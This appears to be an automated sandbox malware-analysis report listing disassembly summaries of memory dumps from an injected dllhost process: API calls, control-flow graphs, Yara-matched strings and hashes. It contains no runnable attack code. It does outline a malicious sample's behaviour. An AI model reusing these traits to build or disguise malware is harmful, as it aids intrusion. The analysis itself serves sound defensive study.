                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 85d5511cacdf028d4defd793ddd69879dfeb92bda28c0ddb2db277c716d1ea96
                                                      • Instruction ID: fa4c7c08b29ce24f58627e2f50f2675b988e05bf873ae5be8c0064623a24998a
                                                      • Opcode Fuzzy Hash: 85d5511cacdf028d4defd793ddd69879dfeb92bda28c0ddb2db277c716d1ea96
                                                      • Instruction Fuzzy Hash: 1790027120140C46D100B1984804B46000587E0302F65C056A5168654D8715C9557522
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1efaae26aeb1c283a8fbd7192043456013867ada9fe928ea226e3be2e1a45391
                                                      • Instruction ID: 2d4d5b5bbcaac1651a565dbec0ae8bc8c9ff33a088c1f77771757d2183afe182
                                                      • Opcode Fuzzy Hash: 1efaae26aeb1c283a8fbd7192043456013867ada9fe928ea226e3be2e1a45391
                                                      • Instruction Fuzzy Hash: 7390027120148C06D110B198880474A000587D0302F69C451A9468658D879589957122

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 407 3090b20-3090b23 408 3090b92-3090b98 407->408 409 3090b25-3090b39 407->409 410 3090b9a 408->410 411 3090bdf-3090c37 call 30ab300 call 30abd10 call 3094350 call 3081410 call 30a1a20 408->411 409->408 410->411 422 3090c39-3090c48 PostThreadMessageW 411->422 423 3090c57-3090c5d 411->423 422->423 424 3090c4a-3090c54 422->424 424->423
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -400GIK8$-400GIK8$GIK8$Z
                                                      • API String ID: 0-653522745
                                                      • Opcode ID: eac7ba4d163e5a854b17bdaed1568878dca5e54894b221a5fd5757eb99d6fd42
                                                      • Instruction ID: 69da26c419f3959d5a280fb431ab9605c68be8262191de984e364d7b02d2a947
                                                      • Opcode Fuzzy Hash: eac7ba4d163e5a854b17bdaed1568878dca5e54894b221a5fd5757eb99d6fd42
                                                      • Instruction Fuzzy Hash: 23114CB6D0235C7AEF11EBE86C80CEFB77CDF85158F048159FA14BB201E5244E024BA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 425 3090bd0-3090be2 426 3090bea-3090c37 call 30abd10 call 3094350 call 3081410 call 30a1a20 425->426 427 3090be5 call 30ab300 425->427 436 3090c39-3090c48 PostThreadMessageW 426->436 437 3090c57-3090c5d 426->437 427->426 436->437 438 3090c4a-3090c54 436->438 438->437
                                                      APIs
                                                      • PostThreadMessageW.USER32(-400GIK8,00000111,00000000,00000000), ref: 03090C44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: -400GIK8$-400GIK8$GIK8
                                                      • API String ID: 1836367815-3772982883
                                                      • Opcode ID: 13fcc1ef4bd0f625f57d019f22b10825f647038829c87a7879590de8d61af625
                                                      • Instruction ID: 7b07bb10c8b265c387f1c1f862e79529ebc2565e8abcd34dc9553c8e958073d7
                                                      • Opcode Fuzzy Hash: 13fcc1ef4bd0f625f57d019f22b10825f647038829c87a7879590de8d61af625
                                                      • Instruction Fuzzy Hash: 2E01D6B6D0220C7AEB11EBE5AC81DEFBB7CDF81194F048055FA14BB140D5345E068BB1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 533 30a3765-30a3771 534 30a37ae-30a37be 533->534 535 30a3773-30a3786 533->535 536 30a37bf-30a37df 534->536 537 30a3787 535->537 538 30a37e0-30a37ea 536->538 537->537 539 30a3789-30a3795 537->539 540 30a37ec-30a37f6 538->540 539->540 541 30a3798-30a3799 539->541 540->536 543 30a37f8-30a3812 540->543 541->534 541->538 545 30a3846-30a3849 543->545 546 30a3814 543->546 547 30a384c-30a384e 545->547 548 30a38c5-30a38ca 545->548 549 30a3850-30a3855 547->549 550 30a3861 547->550 551 30a38cc-30a38d3 548->551 552 30a3935-30a395d call 30a1a20 548->552 555 30a3868-30a3881 549->555 556 30a3857-30a385b 549->556 550->555 553 30a3903-30a3934 call 3094350 call 3081410 551->553 554 30a38d5-30a38e8 call 30ab1d0 551->554 563 30a3962-30a3976 Sleep 552->563 553->552 570 30a38ee-30a38ff call 30ab2b0 554->570 571 30a39e6-30a39ec 554->571 555->548 556->550 564 30a3978-30a398a 563->564 565 30a39d7-30a39de 563->565 568 30a39ac-30a39c4 564->568 569 30a398c-30a39aa call 30a5d30 564->569 565->563 572 30a39e0 565->572 576 30a39ca-30a39cd 568->576 577 30a39c5 call 30a5dd0 568->577 569->576 570->553 572->571 576->565 577->576
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 80o\$net.dll$wininet.dll
                                                      • API String ID: 0-538219777
                                                      • Opcode ID: cb3b96e9a89d63c7bc9c79de9a1129bf5232529b1a1b4f49ad23c046dfe60e0a
                                                      • Instruction ID: 7dca11474e6fcef8bacbe2e501693605c4447554897668f18a082e3c091dd183
                                                      • Opcode Fuzzy Hash: cb3b96e9a89d63c7bc9c79de9a1129bf5232529b1a1b4f49ad23c046dfe60e0a
                                                      • Instruction Fuzzy Hash: 2351797960AB46ABC715DFB8EC80ADAFBA5FF86310F58429DD4488F142D3319506CB80
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 030A396D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: f33f017fbf3e3321cbd77f03bcea2f29ffedd60909c9c92cac74ced7fff41ca0
                                                      • Instruction ID: 9ace2e19ec8f839040f661c35e1cda0715985220b708c82bc7d94f7ce0a052c4
                                                      • Opcode Fuzzy Hash: f33f017fbf3e3321cbd77f03bcea2f29ffedd60909c9c92cac74ced7fff41ca0
                                                      • Instruction Fuzzy Hash: A131B2B5602B05BBD714DFA8DC84FEBB7B8FB88710F04855DE6196B240D370A641CBA5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 918ef818144e3ce6cdf1ae9e01c5579cb725b36442f0dd78a0679317622e8153
                                                      • Instruction ID: ae868a92e96f822e78b391a4b6d070670fa5c7ce06344f1639dfa0cfe41bbaf0
                                                      • Opcode Fuzzy Hash: 918ef818144e3ce6cdf1ae9e01c5579cb725b36442f0dd78a0679317622e8153
                                                      • Instruction Fuzzy Hash: 77311BB5A0060AAFDF00DFD8D8809EEB7B9BF88304B148559E905EB214D775EE458BA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: fee7cd982c05f8d6c874dcbe257ad0534064010ea36828d09f836197023f9916
                                                      • Instruction ID: 1b4b29f5f74340f01f2bb6cabf762ba7482106a7ba0966a3ba94e60646c38fb7
                                                      • Opcode Fuzzy Hash: fee7cd982c05f8d6c874dcbe257ad0534064010ea36828d09f836197023f9916
                                                      • Instruction Fuzzy Hash: 7A311EB5A0060AAFDF00DFD8D8809EFB7B9BF88304B148559E515EB214D775EE45CBA0
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 030A396D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 3e49cf94c519029c4992a72a2d85e481701ff337a48d5c3cba7132694161c256
                                                      • Instruction ID: 92e68d020c032385e7f8e1edc555b06902f3fbcb667bd4d14e2e26aecfbad2fa
                                                      • Opcode Fuzzy Hash: 3e49cf94c519029c4992a72a2d85e481701ff337a48d5c3cba7132694161c256
                                                      • Instruction Fuzzy Hash: 4531C474602B05BBD714DFA8DC80FEABBB9FB88310F14455DE6196F280D374A651CBA4
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 030A396D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 576af95087b28bab2f0bed31e5418d25e6a3543c4f930b6588b5adabfd701a7d
                                                      • Instruction ID: c05d753326272f80f5e3b1951a94268fd54a5efc204dfccebb6091ecd72e7d4c
                                                      • Opcode Fuzzy Hash: 576af95087b28bab2f0bed31e5418d25e6a3543c4f930b6588b5adabfd701a7d
                                                      • Instruction Fuzzy Hash: 1C21B079706B05ABC714DFA8EC80BE6F7A9FB88310F04465EE51D9B240D374A6518B91
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 03091AF7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID:
                                                      • API String ID: 724789610-0
                                                      • Opcode ID: d3b361d680337a6ee4eb288a75d969f0595c85544705554816a3acbc10683ee8
                                                      • Instruction ID: a0b1b36802de9f040f74fe1114ad94791fc90c8186077e9a5a91d6bc278feef6
                                                      • Opcode Fuzzy Hash: d3b361d680337a6ee4eb288a75d969f0595c85544705554816a3acbc10683ee8
                                                      • Instruction Fuzzy Hash: 67A18071E0270AABEF54DFE8CC45BEEB7F8AF49300F04406AE119AB240E7705645DBA5
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 03091AF7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID:
                                                      • API String ID: 724789610-0
                                                      • Opcode ID: 516cf429d016a6ff8ac442b9269b4e6b30d68b0bf1ba057320d56a02165ff46c
                                                      • Instruction ID: 4137f135925e0b1a53ed7f66cee90a3f7efddffe440577f3ad3c7aae2355dab1
                                                      • Opcode Fuzzy Hash: 516cf429d016a6ff8ac442b9269b4e6b30d68b0bf1ba057320d56a02165ff46c
                                                      • Instruction Fuzzy Hash: F611E472D02709AFDB40EBE49C41BDEB7B8AF89200F14015ADA08BB241E6706B458BF5
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030943C2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 0b8fb32eae88c5c9228a46ec6bc86057337fe66ab97db823035b395548dd24e0
                                                      • Instruction ID: f42bc9b03de7612f1190be516be7aa9dc77fd637b5dfe837946ad840254070ce
                                                      • Opcode Fuzzy Hash: 0b8fb32eae88c5c9228a46ec6bc86057337fe66ab97db823035b395548dd24e0
                                                      • Instruction Fuzzy Hash: 950171B9E0120DABEF10DBE5EC41FDDB7B8AB54208F048195ED089B240F630EB09CB91
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,03098114,00000010,00000000,?,?,00000044,00000000,00000010,03098114,?,?,00000000), ref: 030A95F3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: cce3d388c8d416e2bf09e179881ad609b8d8886d9b06ef5712441dc407d2a722
                                                      • Instruction ID: f3e3b98d635d84f45f4d22f661980bc0e3bc4ffaad3d800d25fc5098a4f4a195
                                                      • Opcode Fuzzy Hash: cce3d388c8d416e2bf09e179881ad609b8d8886d9b06ef5712441dc407d2a722
                                                      • Instruction Fuzzy Hash: C60184B6215508BFCB44DE9DDC81EDB77ADAF8C754F418208BA09D7241D630F8518BA4
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03089A62
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 9544ea1842ddfdffe2327f6eac0dbe14d2d1e97db16adfee7172432364c7f8cd
                                                      • Instruction ID: 7524b1a036fef7478229f55d54ce9ab2fc578785b0193ca2d4c920e1b794beec
                                                      • Opcode Fuzzy Hash: 9544ea1842ddfdffe2327f6eac0dbe14d2d1e97db16adfee7172432364c7f8cd
                                                      • Instruction Fuzzy Hash: 85F0303734170476E220B6D9AC02FD7B39C9BC4761F150025F60CEA180D591B50142A4
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03089A62
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 6cc13d43699ab0338b1c25ece68ad14cd3d52459fa90d5731e412230d04a57a7
                                                      • Instruction ID: 7740c27b270f1bae7144bc5db244f1f2344f15d83159968d8cf4c0ffb8d1ce19
                                                      • Opcode Fuzzy Hash: 6cc13d43699ab0338b1c25ece68ad14cd3d52459fa90d5731e412230d04a57a7
                                                      • Instruction Fuzzy Hash: 9AE09A3628570476E230B6D99C02FD7B39C9FC4BA1F290129F708AF2C0E9A1B90242E4
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C4BDB403,00000007,00000000,00000004,00000000,03093BD0,000000F4), ref: 030A953F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 1947698e40c1165014aee0107ac1bdbcaff194db23f75dfb866f3048cffbd340
                                                      • Instruction ID: 0971ae5cce5b988379c8bd163de6fe7e450286c3e7a055a577cc21910c054151
                                                      • Opcode Fuzzy Hash: 1947698e40c1165014aee0107ac1bdbcaff194db23f75dfb866f3048cffbd340
                                                      • Instruction Fuzzy Hash: FBE032BA6102087BD614EA98DC50EEB33ACEFC9610F008008B909AB281D620B9118AB8
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(03091849,?,030A5D33,03091849,030A546F,030A5D33,?,03091849,030A546F,00001000,?,?,00000000), ref: 030A94EC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 242cc347b1d4e26beb6f4c6ed2bcd6ae15dc4846549bfd8d45fe707bd8143e29
                                                      • Instruction ID: 46f52ed6b9f5e0e15880276c6d449ee52d3decad4b13d5d786212463c3f5b6ba
                                                      • Opcode Fuzzy Hash: 242cc347b1d4e26beb6f4c6ed2bcd6ae15dc4846549bfd8d45fe707bd8143e29
                                                      • Instruction Fuzzy Hash: 84E0327A610204BBD614EA98EC41EAB33ACEFC9710F004009BA08AB281D620B911CAB8
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,03091B40,030A7DAF,030A546F,03091B10), ref: 03097F81
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 33efac3356cfd28650d1dafee2bc450014080f433e97bd4bf8f89a86008af293
                                                      • Instruction ID: e1c88d667a1a693d466ca965e5571a7ea61c937d48121662bca4a2fac7884ee0
                                                      • Opcode Fuzzy Hash: 33efac3356cfd28650d1dafee2bc450014080f433e97bd4bf8f89a86008af293
                                                      • Instruction Fuzzy Hash: 88E0C2766C03017BF600FAE4DC02FAA22885BD4790F084068F688DF2C2ED51D0004661
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,03091B40,030A7DAF,030A546F,03091B10), ref: 03097F81
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: b6115f9d02eced3fc1e0648b8972fdf0c9439dafe199d4f909e99303927f6983
                                                      • Instruction ID: c73c6584fb73a77921ffb2e5fb372ab2b956b875f611a71a5237524e5dd75e78
                                                      • Opcode Fuzzy Hash: b6115f9d02eced3fc1e0648b8972fdf0c9439dafe199d4f909e99303927f6983
                                                      • Instruction Fuzzy Hash: 12D05E7A6903043BFA44FBE89C02FAA328D5B94650F084068BA48EF283ED65E1104665
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE ref: 0309817A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                      • Instruction ID: 6db08989929a1e41434b1cd0a580447098b6d69b3e94f90d298288ceb45edc1c
                                                      • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                      • Instruction Fuzzy Hash: 15C08C3122200814FFA085FC7C4A3A3738C8B8333CB1C4E12F42CDA5E0C12294A7A000
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 66fec827fd0e16ca67add6bbfa40072ad633f55ae0c95e746a0bffbfc5ca1f6f
                                                      • Instruction ID: 9523a707231459e31fae3626f8c0c23d1e041e2984e9a571f35a46fe233f1815
                                                      • Opcode Fuzzy Hash: 66fec827fd0e16ca67add6bbfa40072ad633f55ae0c95e746a0bffbfc5ca1f6f
                                                      • Instruction Fuzzy Hash: AEB09B719015C5C9DA11E7A04A08717790467D0741F29C4E1E7074641F4739C5D5E176
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412290629.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3680000_dllhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 160a77c946299442ad0c3c37b744229b213d9c9c2897ed5b05b88af3c08c9241
                                                      • Instruction ID: f6a2ba04698c7c4d64c68deee0c9e30cbe87797ec0f3d397048cc936baf16983
                                                      • Opcode Fuzzy Hash: 160a77c946299442ad0c3c37b744229b213d9c9c2897ed5b05b88af3c08c9241
                                                      • Instruction Fuzzy Hash: 7E41E37460DB095FD768FF689081276F3E5FB89300F500A2EC98AC7352EA70E8468699
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e62737929bd4b30ef0007abe47d6de8439fec4ad915a7deea6553ef4bcc6c77
                                                      • Instruction ID: 52933c291347574ef5700915221f9911044281316bed55c541ac09f24fab45b0
                                                      • Opcode Fuzzy Hash: 0e62737929bd4b30ef0007abe47d6de8439fec4ad915a7deea6553ef4bcc6c77
                                                      • Instruction Fuzzy Hash: 01C08C36A8902411C112580C68002F4FBA0C78B221E8223B2E888E3220824BD4630BC8
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cdd20faa96bde88c7db37ec2c7abfe3ccece25f4f8c210542b9e1275b2150db
                                                      • Instruction ID: 9dab22c3f825853ea68a695cefb31d992ecec7028f5550e0238d60c161280e61
                                                      • Opcode Fuzzy Hash: 4cdd20faa96bde88c7db37ec2c7abfe3ccece25f4f8c210542b9e1275b2150db
                                                      • Instruction Fuzzy Hash: EEB09213EC100912942059493C81074F7B4E387436F8022F2CD8DF7A10A002C42601AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412290629.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3680000_dllhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3558027158
                                                      • Opcode ID: 091546651cffe7b45aca12303f1033ffb8de866ccbe69bfe2ccf3a7f705bbd0e
                                                      • Instruction ID: a4f149f6842d52fed736327a5e08f114e7c4114028000c29dff08d92ec2c4f91
                                                      • Opcode Fuzzy Hash: 091546651cffe7b45aca12303f1033ffb8de866ccbe69bfe2ccf3a7f705bbd0e
                                                      • Instruction Fuzzy Hash: EC914EF04083988AC7158F54A1652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 0df3a5f6d5e5f040a6ee206413475dde34ef3efde1f7bff16a5e473c01fc46e5
                                                      • Instruction ID: a54cee13f22fce9d80688fa4f69d2cc347194f5aa364404fc692ec7e779dbb5b
                                                      • Opcode Fuzzy Hash: 0df3a5f6d5e5f040a6ee206413475dde34ef3efde1f7bff16a5e473c01fc46e5
                                                      • Instruction Fuzzy Hash: 5A51F9B5A0411ABFCB15EBDC898097EF7B8BB0820471485E9F8A5D7641D774DE40CBE1
                                                      Strings
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03884742
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038846FC
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03884787
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03884655
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03884725
                                                      • ExecuteOptions, xrefs: 038846A0
                                                      • Execute=1, xrefs: 03884713
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
